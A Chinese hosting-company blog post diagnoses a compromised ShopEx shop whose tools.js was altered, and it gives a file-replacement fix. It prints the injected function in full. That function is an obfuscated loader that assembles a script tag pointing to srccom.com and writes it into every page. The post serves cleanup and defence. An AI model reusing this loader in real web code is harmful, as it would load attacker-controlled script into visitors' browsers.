大家都知道shopex是一款开源的程序。很多做电商的站长的朋友们都是使用的这个开源程序。但是开源的程序有很多bug，黑客就是瞅准了这些漏洞进行攻击。其中有一种，攻击的对象就是js文件。今天小编就遇到了一个站长朋友的网站受到这样的攻击。js文件里包含了恶意代码，从而触发了恶意访问请求。 无忧主机小编在分析客户网站访问时，发现网站加载特别慢，原因是加载了以下链接： srccom.com/SRC.SRC 而这个链接，单独访问是无法访问的。也就是说由于这个无法访问的链接程序一直在进行调用，但是调用失败出现pending响应返回，导致加载缓慢。根据链接调用分析，报错来自于tools.js文件。粗略查看程序发现tools.js中并没有恶意URL的关键字。无忧主机小编把客户的tools.js文件下载到本地，仔细对比shopex开源源码的tools.js，发现文件中被植入了一段恶意函数，函数代码如下：

function CurrentXmlFrmFocus(){

var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];

var arsOffset=[" ",":",".","/","<",">","=","'","CRS","MOC","TPIRCS","PTTH"];

var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];

var strgAttribute=”";

ardPopOpacity=ardPopOpacity.concat(arnElement);

for(var i=0;i<ardPopOpacity.length;i++) strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]].split(“”).reverse().join(“”);

document.writeln(strgAttribute);

}

具体的解决方案如下： 找到网站根目录下的statics/script/tools.js文件，使用shopex最新安装包中的JS文件上传替换它！   按照以上发法替换后，到网站后台更新下缓存就可以解决。最近shopex中此问题爆发比较频繁，希望此文能引起shopex站长们的重视，也希望这篇技术文章能帮到遇到同样问题的站长们。 相关文章推荐阅读： 解决SHOPEX添加商品无法上传商品图片的方法 SHOPEX去除底部版权信息“POWERED BY SHOPEX V4.8.5 ” 解决SHOPEX打开网页一直加载EC.PINGTCSS.QQ.COM的方法    

本文地址：https://www.51php.com/shopex/13741.html

上一篇: phpcmsV9网站后台取消后台验证码方法
下一篇: Joomla3.2伪静态开启方法！2014最新版joomla伪静态配置教程